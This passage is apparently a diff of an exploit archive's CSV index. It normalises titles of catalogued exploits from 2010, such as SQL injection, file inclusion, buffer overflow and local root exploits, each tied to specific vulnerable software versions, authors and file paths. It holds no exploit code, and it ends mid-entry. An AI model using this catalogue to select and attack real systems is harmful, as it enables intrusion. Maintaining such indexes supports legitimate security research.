+11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 +11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0 11588,platforms/php/webapps/11588.txt,"phpMySite - (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection",2010-02-27,Crux,asp,webapps,0 -11590,platforms/multiple/dos/11590.php,"Mozilla Firefox <= 3.6 - Denial of Service Exploit",2010-02-27,Ale46,multiple,dos,0 +11590,platforms/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service Exploit",2010-02-27,Ale46,multiple,dos,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection",2010-02-27,Crux,php,webapps,0 -11593,platforms/php/webapps/11593.txt,"Uiga Fan Club <= 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 +11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11595,platforms/php/webapps/11595.php,"Joomla Component com_paxgallery Blind Injection",2010-02-27,snakespc,php,webapps,0 11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0 11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem micro_httpd DoS/PoC",2010-02-28,ad0nis,hardware,dos,0 11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal index.php SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11600,platforms/php/webapps/11600.txt,"Uiga Fan Club index.php SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11601,platforms/windows/dos/11601.pl,"Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0 -11602,platforms/php/webapps/11602.txt,"HazelPress Lite <= 0.0.4 - (Auth Bypass) SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 +11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - (Auth Bypass) SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 11603,platforms/php/webapps/11603.txt,"Joomla Component com_yanc SQL Injection",2010-02-28,snakespc,php,webapps,0 11604,platforms/php/webapps/11604.php,"Joomla Component com_liveticker Blind SQL Injection",2010-02-28,snakespc,php,webapps,0 -11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri <= 2.1 - SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 +11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 11606,platforms/asp/webapps/11606.txt,"Majoda CMS (Auth Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0 11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - (id) SQL Injection",2010-03-01,kaMtiEz,php,webapps,0 @@ -10629,8 +10629,8 @@ id,file,description,date,author,platform,type,port 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal index.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Shell Upload",2010-03-03,indoushka,php,webapps,0 -11621,platforms/php/webapps/11621.txt,"Gnat-TGP <= 1.2.20 - Remote File Include",2010-03-03,"cr4wl3r ",php,webapps,0 -11622,platforms/windows/dos/11622.php,"Opera <= 10.50 integer Overflow",2010-03-03,"Marcin Ressel",windows,dos,0 +11621,platforms/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,"cr4wl3r ",php,webapps,0 +11622,platforms/windows/dos/11622.php,"Opera 10.50 integer Overflow",2010-03-03,"Marcin Ressel",windows,dos,0 11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0 11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution Exploit",2010-03-03,JosS,php,webapps,0 11625,platforms/php/webapps/11625.txt,"Joomla Component com_blog directory traversal",2010-03-03,"DevilZ TM",php,webapps,0 @@ -10648,7 +10648,7 @@ id,file,description,date,author,platform,type,port 11639,platforms/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service PoC",2010-03-06,Blade,windows,dos,0 11641,platforms/php/webapps/11641.txt,"phpCOIN 1.2.1 - (mod.php) LFI",2010-03-06,_mlk_,php,webapps,0 11643,platforms/php/webapps/11643.txt,"dev4u CMS (Personenseiten) go_target.php SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 -11644,platforms/multiple/dos/11644.py,"Flare <= 0.6 - Local Heap Overflow DoS",2010-03-06,l3D,multiple,dos,0 +11644,platforms/multiple/dos/11644.py,"Flare 0.6 - Local Heap Overflow DoS",2010-03-06,l3D,multiple,dos,0 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php (id) SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 @@ -10656,13 +10656,13 @@ id,file,description,date,author,platform,type,port 11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 -11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include",2010-03-08,"cr4wl3r ",php,webapps,0 +11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x - (.zip) Local Universal Buffer Overflow PoC Exploit (0Day)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 -11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include",2010-03-08,"cr4wl3r ",php,webapps,0 +11657,platforms/php/webapps/11657.txt,"Chaton 1.5.2 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0 -11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 +11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0 11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL Injection (id)",2010-03-09,kaMtiEz,php,webapps,0 11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote BoF (Metasploit)",2010-03-09,blake,windows,remote,0 @@ -10676,17 +10676,17 @@ id,file,description,date,author,platform,type,port 11678,platforms/php/webapps/11678.txt,"PhpCityPortal - Multiple Vulnerabilities",2010-03-10,R3d-D3V!L,php,webapps,0 11679,platforms/php/webapps/11679.txt,"Softbiz Jobs and Recruitment Script (search_result.php) SQL Injection",2010-03-10,"Easy Laster",php,webapps,0 11680,platforms/php/webapps/11680.txt,"Anantasoft Gazelle CMS - CSRF",2010-03-10,"pratul agrawal",php,webapps,0 -11681,platforms/php/webapps/11681.txt,"ispCP Omega <= 1.0.4 - Remote File Include",2010-03-10,"cr4wl3r ",php,webapps,0 +11681,platforms/php/webapps/11681.txt,"ispCP Omega 1.0.4 - Remote File Inclusion",2010-03-10,"cr4wl3r ",php,webapps,0 14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 - Stack Buffer Overflow",2010-06-28,"fl0 fl0w",windows,local,0 11682,platforms/windows/local/11682.py,"Mini-stream Ripper 3.0.1.1 - (.m3u) HREF Buffer Overflow",2010-03-10,l3D,windows,local,0 11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0 -11684,platforms/php/webapps/11684.txt,"Joomla com_about Remote SQL Injection",2010-03-11,snakespc,php,webapps,0 +11684,platforms/php/webapps/11684.txt,"Joomla com_about SQL Injection",2010-03-11,snakespc,php,webapps,0 11685,platforms/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting",2010-03-11,ITSecTeam,php,webapps,0 11686,platforms/php/webapps/11686.txt,"ANE CMD CRSF - Add Admin",2010-03-11,"pratul agrawal",php,webapps,0 11687,platforms/php/webapps/11687.txt,"ANE CMS 1 - Persistent XSS",2010-03-11,"pratul agrawal",php,webapps,0 11688,platforms/php/webapps/11688.txt,"Joomla Component com_blog SQL Injection",2010-03-11,"DevilZ TM",php,webapps,0 11689,platforms/php/webapps/11689.txt,"Eros Erotik Webkatalog start.php (rubrik&id) SQL Injection",2010-03-11,"Easy Laster",php,webapps,0 -11691,platforms/php/webapps/11691.txt,"Joomla com_products 'intCategoryId' Remote SQL Injection",2010-03-11,N2n-Hacker,php,webapps,0 +11691,platforms/php/webapps/11691.txt,"Joomla com_products 'intCategoryId' SQL Injection",2010-03-11,N2n-Hacker,php,webapps,0 11692,platforms/php/webapps/11692.txt,"Joomla Component com_gigfe SQL Injection",2010-03-11,"DevilZ TM",php,webapps,0 11693,platforms/php/webapps/11693.txt,"Joomla Component com_color SQL Injection",2010-03-11,"DevilZ TM",php,webapps,0 11694,platforms/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",windows,remote,0 @@ -10694,7 +10694,7 @@ id,file,description,date,author,platform,type,port 11696,platforms/php/webapps/11696.txt,"Joomla Component com_start SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 11698,platforms/php/webapps/11698.txt,"Joomla Component com_leader SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 11699,platforms/php/webapps/11699.txt,"Joomla Component com_family SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 -11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - (topic.php) SQL Injection Vulnerbility",2010-03-12,"Yakir Wizman",php,webapps,0 +11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - (topic.php) SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL injection",2010-03-12,"Yakir Wizman",php,webapps,0 11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script news.php - (id) SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 @@ -10713,31 +10713,31 @@ id,file,description,date,author,platform,type,port 11720,platforms/linux/remote/11720.py,"MicroWorld eScan Antivirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0 11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0 -11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express <= 3.01 - Remote Code Execution/Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 +11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution/Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) DoS",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org SQL Injection",2010-03-14,N2n-Hacker,php,webapps,0 -11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 - (downloads.php) SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0 +11726,platforms/php/webapps/11726.txt,"PHP-Fusion 6.01.15.4 - (downloads.php) SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection",2010-03-14,blake,php,webapps,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 -11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Include",2010-03-14,"cr4wl3r ",php,webapps,0 +11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 40084,platforms/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 -11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook Remote SQL Injection",2010-03-14,snakespc,php,webapps,0 +11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook SQL Injection",2010-03-14,snakespc,php,webapps,0 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ITSecTeam,php,webapps,0 -11732,platforms/php/webapps/11732.txt,"PHP-Nuke - Local File Include",2010-03-14,ITSecTeam,php,webapps,0 +11732,platforms/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,php,webapps,0 11733,platforms/php/webapps/11733.txt,"phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection",2010-03-14,"Easy Laster",php,webapps,0 11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication DoS (PoC)",2010-03-14,loneferret,windows,dos,0 -11735,platforms/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Include",2010-03-14,"cr4wl3r ",php,webapps,0 +11735,platforms/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,php,webapps,0 11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC",2006-12-14,"Evgeny Legerov",linux,dos,389 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,php,webapps,0 -11738,platforms/php/webapps/11738.txt,"Joomla component com_gcalendar Suite 2.1.5 - Local File Include",2010-03-15,jdc,php,webapps,0 +11738,platforms/php/webapps/11738.txt,"Joomla component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 -11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0 +11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 -11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0 +11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload",2010-03-15,indoushka,php,webapps,0 11746,platforms/php/webapps/11746.txt,"Torrent Hoster Remont Upload Exploit",2010-03-15,EL-KAHINA,php,webapps,0 @@ -10783,7 +10783,7 @@ id,file,description,date,author,platform,type,port 11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN Local Buffer Overflow",2010-03-17,n00b,multiple,local,0 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate - Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 -11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 +11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 11794,platforms/windows/local/11794.c,"MediaCoder - (.lst) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - LFI",2010-03-18,ITSecTeam,php,webapps,0 @@ -10794,29 +10794,29 @@ id,file,description,date,author,platform,type,port 11803,platforms/windows/dos/11803.txt,"Crimson Editor - SEH Overwrite",2010-03-18,sharpe,windows,dos,0 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 -11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 +11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi CSRF",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"joomla component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 -11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange 1.0 Beta - (pkg) Remote SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 +11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)",2010-03-20,"Easy Laster",php,webapps,0 -11817,platforms/multiple/remote/11817.txt,"KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 +11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 Ksysguard RCE via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 -11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack <= 3.0 - ts_other.php SQL Injection Exploit",2010-03-21,"Easy Laster",php,webapps,0 +11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection Exploit",2010-03-21,"Easy Laster",php,webapps,0 11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software (product.php) SQL Injection",2010-03-21,Asyraf,php,webapps,0 11827,platforms/windows/dos/11827.py,"no$gba 2.5c (.nds) Local crash",2010-03-21,l3D,windows,dos,0 11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 SEH Overwrite PoC Exploit",2010-03-21,mr_me,windows,local,0 11829,platforms/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection",2010-03-21,n3w7u,php,webapps,0 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote Include",2010-03-21,"cr4wl3r ",php,webapps,0 -11831,platforms/php/webapps/11831.txt,"WebMaid CMS <= 0.2-6 Beta - Multiple Remote File Include",2010-03-21,"cr4wl3r ",php,webapps,0 -11832,platforms/php/webapps/11832.txt,"NotSopureEdit <= 1.4.1 - Remote File Include",2010-03-21,"cr4wl3r ",php,webapps,0 -11833,platforms/php/webapps/11833.txt,"4x CMS <= r26 - (Auth Bypass) SQL Injection",2010-03-21,"cr4wl3r ",php,webapps,0 +11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,"cr4wl3r ",php,webapps,0 +11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,"cr4wl3r ",php,webapps,0 +11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Auth Bypass) SQL Injection",2010-03-21,"cr4wl3r ",php,webapps,0 11834,platforms/windows/local/11834.py,"Kenward Zipper 1.4 - Stack Buffer Overflow PoC Exploit (0Day)",2010-03-22,mr_me,windows,local,0 11835,platforms/php/webapps/11835.txt,"Mini CMS RibaFS 1.0 - (Auth Bypass) SQL Injection",2010-03-22,"cr4wl3r ",php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage (index.php) SQL Injection",2010-03-22,Phenom,php,webapps,0 @@ -10824,14 +10824,14 @@ id,file,description,date,author,platform,type,port 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 - (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash PoC",2010-03-22,b0telh0,windows,dos,0 -11840,platforms/php/webapps/11840.txt,"PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection",2010-03-22,"Easy Laster",php,webapps,0 +11840,platforms/php/webapps/11840.txt,"PowieSys 0.7.7 alpha index.php (shownews) SQL Injection",2010-03-22,"Easy Laster",php,webapps,0 11841,platforms/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 11842,platforms/windows/dos/11842.py,"FreeSSHD 1.2.4 - Remote Buffer Overflow DoS",2010-03-22,Pi3rrot,windows,dos,0 11844,platforms/php/webapps/11844.txt,"Joomla Component com_flash SQL Injection",2010-03-22,"DevilZ TM",php,webapps,0 -11845,platforms/php/webapps/11845.txt,"Joomla component com_jwmmxtd <= Remote File Inclusion",2010-03-23,eidelweiss,php,webapps,0 -11846,platforms/php/webapps/11846.txt,"Uiga Business Portal <= index.php SQL Injection",2010-03-23,"Easy Laster",php,webapps,0 +11845,platforms/php/webapps/11845.txt,"Joomla component com_jwmmxtd Remote File Inclusion",2010-03-23,eidelweiss,php,webapps,0 +11846,platforms/php/webapps/11846.txt,"Uiga Business Portal index.php SQL Injection",2010-03-23,"Easy Laster",php,webapps,0 11847,platforms/windows/webapps/11847.txt,"Joomla Component com_gds SQL Injection",2010-03-23,"DevilZ TM",windows,webapps,0 -11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Include",2010-03-23,mat,php,webapps,0 +11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Inclusion",2010-03-23,mat,php,webapps,0 11850,platforms/php/webapps/11850.txt,"Zephyrus CMS (index.php) SQL Injection",2010-03-23,Phenom,php,webapps,0 11851,platforms/php/webapps/11851.txt,"Joomla Component Property Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11852,platforms/php/webapps/11852.txt,"Xataface Admin Auth Bypass",2010-03-23,Xinapse,php,webapps,0 @@ -10840,7 +10840,7 @@ id,file,description,date,author,platform,type,port 11856,platforms/multiple/remote/11856.txt,"uhttp Server Path Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 11857,platforms/windows/remote/11857.c,"MX Simulator Server Remote Buffer Overflow PoC",2010-03-23,"Salvatore Fresta",windows,remote,0 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - (.mp3) Local Crash PoC",2010-03-24,chap0,windows,dos,0 -11862,platforms/php/webapps/11862.txt,"Easy-Clanpage <= 2.0 - Blind SQL Injection Exploit",2010-03-24,"Easy Laster",php,webapps,0 +11862,platforms/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection Exploit",2010-03-24,"Easy Laster",php,webapps,0 11863,platforms/php/webapps/11863.txt,"CMS By SoftnSolv (index.php) SQL Injection Vulnerable",2010-03-24,"Th3 RDX",php,webapps,0 11864,platforms/php/webapps/11864.txt,"E-php CMS SQL Injection",2010-03-24,"Th3 RDX",php,webapps,0 11865,platforms/php/webapps/11865.txt,"Joomla component com_universal Remote File Inclusion Exploit",2010-03-24,eidelweiss,php,webapps,0 @@ -10851,39 +10851,39 @@ id,file,description,date,author,platform,type,port 11872,platforms/windows/local/11872.py,"KenWard's Zipper 1.400 - Buffer Overflow Method 2",2010-03-25,sinn3r,windows,local,0 11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS SQL Injection",2010-03-25,Inj3ct0r,php,webapps,0 11874,platforms/php/webapps/11874.txt,"INVOhost SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 -11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 +11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - (index.php) <= LFI",2010-03-25,eidelweiss,php,webapps,0 11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF (2)",2010-03-25,sud0,windows,remote,21 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection Exploit",2010-03-25,Sc0rpi0n,php,webapps,0 -11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Include",2010-03-25,mat,php,webapps,0 +11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File 